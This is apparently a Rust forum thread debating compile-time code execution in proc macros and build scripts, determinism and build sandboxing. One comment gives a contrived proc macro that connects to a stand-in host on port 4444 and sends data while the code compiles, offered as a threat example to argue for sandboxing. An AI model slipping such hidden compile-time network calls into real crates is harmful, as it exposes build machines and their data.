Is executing arbitrary code at build time a good idea?

FWIW, running arbitrary non-deterministic code at build time is very undesirable. I’d love it if there were a way to guarantee that proc-macros are always deterministic (or at least a way to absolutely forbid anything that’s non-deterministic, like poking at an external database schema).

Without that, there would never be a way for the build system to determine whether a given target is up to date, nor would there be a guaranteed way to reproduce a given target binary.

Proc-macros are probably OK, given that they can be audited, and there’s at least some friction to writing a new one - and you can detect their presence by looking at the dependency graph. Allowing any arbitrary code to do non-deterministic computation at compile time is definitely not OK.

@jsgf I respectfully disagree with you on this. Pretend that you need to solve a particular NP-complete problem instance to really optimize some block of code. You've done something really smart and written a procedural macro that is able to use rayon to parallelize the work, but since you have to search an exponential space, you really can't tell how long it will take. This is best done once, at compile time, on some really powerful dev machine (maybe overnight). The alternative is finding each block of code that needs this optimization, extracting it by hand, running some custom code over that extraction, and then putting it back into the code base. You can extend this idea to run it on something like scoop, which makes the compilation time non-deterministic.
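To sketch the idea (everything below, including candidates and score, is a made-up stand-in for the real problem encoding):

```rust
// Inside a hypothetical optimizing proc macro: use rayon at expansion
// time to search a large candidate space in parallel.
use rayon::prelude::*;

/// Placeholder objective function for the NP-complete instance.
fn score(candidate: &[u8]) -> u64 {
    candidate.iter().map(|&b| b as u64).sum()
}

/// Searches all candidates in parallel and returns the best one.
/// With an exponential space, there is no bound on how long this takes.
fn best_solution(candidates: Vec<Vec<u8>>) -> Vec<u8> {
    candidates
        .into_par_iter()
        .max_by_key(|c| score(c))
        .expect("non-empty search space")
}
```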

It doesn’t matter if it’s a good idea. Proc macros are stable now and Rust guarantees they will be supported forever.

Shouldn’t you have the same concern about build scripts in general?

There’s a useful distinction to draw here. There are two kinds of before-runtime computation that tend to get shoved together under “compile time” (which does keep the result up to date) but that have different connotations. Also, what does determinism actually get us?

I see two distinct types of precomputation. Compile-time macros are the normal, and typically cheap, manipulation of localized information. Const computation falls into the same bucket.
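For instance, this kind of thing: a lookup table the compiler computes entirely at compile time, deterministically, from nothing but the source text.

```rust
// Cheap, localized compile-time work: const evaluation.
const fn popcount(mut x: u8) -> u32 {
    let mut n = 0;
    while x != 0 {
        n += (x & 1) as u32;
        x >>= 1;
    }
    n
}

// The entire table is computed by the compiler; no build script needed.
const POPCOUNT: [u32; 256] = {
    let mut table = [0u32; 256];
    let mut i = 0;
    while i < 256 {
        table[i] = popcount(i as u8);
        i += 1;
    }
    table
};
```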

The best example of the other category is ML models: precomputed information that doesn’t need to be regenerated every build, and shouldn’t be. This category also has much weaker determinism requirements, and much less ability to be deterministic.

Unless you’re concerned about full bit-for-bit reproducibility (which is a good but hard thing), what determinism gives you is consistent behavior and the ability for the compiler to aggressively cache things. For that reason, even nondeterministic proc macros aren’t an issue, so long as their surface area is deterministic.

I would think a nondeterministic proc macro is already forbidden (or rather, the compiler must make some assumptions about things proc macros do not do) because nondeterminism would destroy all hope of incremental compilation.
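For a concrete (deliberately bad, made-up) example, consider a macro that embeds the current time: the same input produces different tokens on every expansion, so there is nothing stable to key a cache on.

```rust
// In a proc-macro crate: a deliberately nondeterministic macro.
use proc_macro::TokenStream;
use std::time::{SystemTime, UNIX_EPOCH};

#[proc_macro]
pub fn build_timestamp(_input: TokenStream) -> TokenStream {
    let secs = SystemTime::now()
        .duration_since(UNIX_EPOCH)
        .expect("clock before 1970")
        .as_secs();
    // Same input, different output on each expansion: incremental
    // compilation has no stable result to reuse.
    format!("{}u64", secs).parse().unwrap()
}
```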


I agree with this; however, the existing Rust build-time code execution system is what it is, so we need to work within those constraints. We could potentially add new build-time restrictions which pass crater, though.

Several other members of the Secure Code WG and I have discussed this extensively, and several of us feel that adding some sort of build-time sandboxing is a high-priority item.

As it happens, I just blogged about this (as in hours ago; the post is still an ever-growing WIP) as part of the 2019 roadmap, giving my rationale for why a build-time sandbox is a good idea:

I do intend to further expand that section with additional details of what an actual sandbox might look like. On Linux, it would be nice to find a seccomp policy which heavily restricts "exotic" system calls, so as to reduce the likelihood of build.rs scripts escalating to root through kernel bugs.
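For a sense of the mechanism (this is a sketch, not a proposed policy): Linux's seccomp strict mode, entered via prctl(2), permits only read, write, _exit, and sigreturn. A realistic build.rs policy would instead install a BPF filter (SECCOMP_MODE_FILTER) whitelisting the syscalls build scripts actually need.

```rust
// Sketch only: enter seccomp strict mode before running untrusted
// build-time code. Requires the libc crate, Linux only.
#[cfg(target_os = "linux")]
fn enter_strict_sandbox() {
    // SECCOMP_MODE_STRICT == 1
    let rc = unsafe { libc::prctl(libc::PR_SET_SECCOMP, 1) };
    assert_eq!(rc, 0, "prctl(PR_SET_SECCOMP) failed");
    // From here on, any syscall outside {read, write, _exit, sigreturn}
    // kills the process with SIGKILL. Even returning from main() would
    // die (it calls exit_group), so a real sandbox exits via libc::_exit.
}
```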


I don’t think that eliminating all possible sources of nondeterminism is possible or desirable, but I do think we could do better at providing ways to detect and avoid inadvertent nondeterminism.

In particular, build scripts often use environment variables, and need to remember to manually print cargo:rerun-if-env-changed for all relevant ones (see the sketch after this list). I’d like to see:

  • An option (or even a default) to clear the entire environment before running build scripts; the build script could then provide a whitelist of variables which would not be cleared, but which would trigger a rebuild if changed. Some variables, such as PATH, could be whitelisted by default. There would also have to be a way for the user to manually whitelist additional variables for various reasons. For instance, they might want to pass platform-specific environment variables to their C compiler when building a crate that uses cc-rs to compile C code: e.g. SDKROOT on macOS.

  • A tool to instrument getenv calls from build scripts and their subprocesses to identify environment variables they use. This would be especially useful without environment variable whitelisting, but still useful with it, because those variables could be added to the whitelist to save the user the inconvenience of manually whitelisting them. Instrumenting getenv requires platform-specific techniques and isn’t always possible (on Linux, it won’t work for statically-linked binaries), so such a tool would necessarily be “best-effort”, but it could work in the most common cases.
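For reference, here’s the manual pattern the first bullet would replace, with SDKROOT standing in for any platform-specific variable:

```rust
// build.rs: declaring an environment-variable dependency by hand.
fn main() {
    // Without this line, changing SDKROOT would not trigger a rebuild.
    println!("cargo:rerun-if-env-changed=SDKROOT");

    // The variable may be unset on non-macOS hosts.
    if let Ok(sdkroot) = std::env::var("SDKROOT") {
        // Forward it to the crate being compiled (readable via env!()).
        println!("cargo:rustc-env=BUILD_SDKROOT={}", sdkroot);
    }
}
```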

See also: https://github.com/rust-lang/cargo/issues/5282


I fully agree with the sandboxing idea, but how will you do it? Is there a model of what is permissible, and what isn’t? I’m thinking back to my distributed compilation idea; right now, I think it may be possible to write a proc macro that lets you reach across the network at compile time to distribute chunks of code for further processing. The problem is that this means you can have a Trojan horse: Evil Hacker™ contributes code to some project that includes a proc macro that, when compiled, immediately starts scanning the network of the machine it’s being compiled on, and then sends that information to Evil Hacker™. So now we need a networking model that limits what damage a bad macro can inflict.
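To make the threat concrete, here’s a contrived sketch (the address is a reserved documentation IP); note the side effect runs on the build machine, not in the compiled program:

```rust
// In a proc-macro crate: compile-time I/O is completely unrestricted today.
use proc_macro::TokenStream;
use std::io::Write;
use std::net::TcpStream;

#[proc_macro]
pub fn innocuous_helper(_input: TokenStream) -> TokenStream {
    // This connection is made while *your* code compiles.
    if let Ok(mut stream) = TcpStream::connect("198.51.100.7:4444") {
        let _ = stream.write_all(b"hello from your build machine");
    }
    TokenStream::new() // expands to nothing; the damage is already done
}
```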

On top of that, the sandboxes will likely need to be recursive; vec![evil!(), evil!(), evil!()]; shouldn’t leak into vec!() if at all possible (that example is too contrived; you can probably think of something better).

In short, it’s a headache, and I’m glad you guys are working on it, and not me! :stuck_out_tongue:

I started an issue about this on the Secure Code WG, and wrote down some initial thoughts:

I think there are several directions this could take, and I documented some prior art around "a model of what is permissible, and what isn’t".

I think there's a "do no harm" sandbox path that can be pursued immediately, restricting build scripts from making exotic system calls (which no existing build scripts use, but which are potential local privilege escalation targets in the kernel).

But there's also an "ambitious" sandbox, which could use things like gaol to lock down compile-time code execution. It'd have to be off by default at first, with users opting in, but with enough work I think something like that could be on by default in the next edition. Perhaps these scripts could have optional build-time capabilities, like network access, which crate users must opt into.

Both approaches have merit, I think, and can be worked on in parallel, independently of each other.

@bascule I just replied on your GitHub issue, but here’s a quick recap for everyone…

I propose that we create an Underhanded Rust code contest, similar to the Underhanded C Contest. We don’t have to write full Rust out for everything, but it would gather into one place all the evil that can be done from within the compiler at compile time, which would inform what the security posture/sandbox will need to be in the future.


We sort of did create it already (http://blog.community.rs/underhanded/2017/09/27/underhanded-results.html), but apparently we failed to make it a recurring thing?


Indeed, it was a one-time thing (so far), due to a lack of people driving it forward. If people want to set one up again, the Community Team would definitely be interested in promoting it.

Sounds like something the Secure Code WG could potentially carry forward.


Let’s talk!


I created a tracking issue here: https://github.com/rust-community/team/issues/256
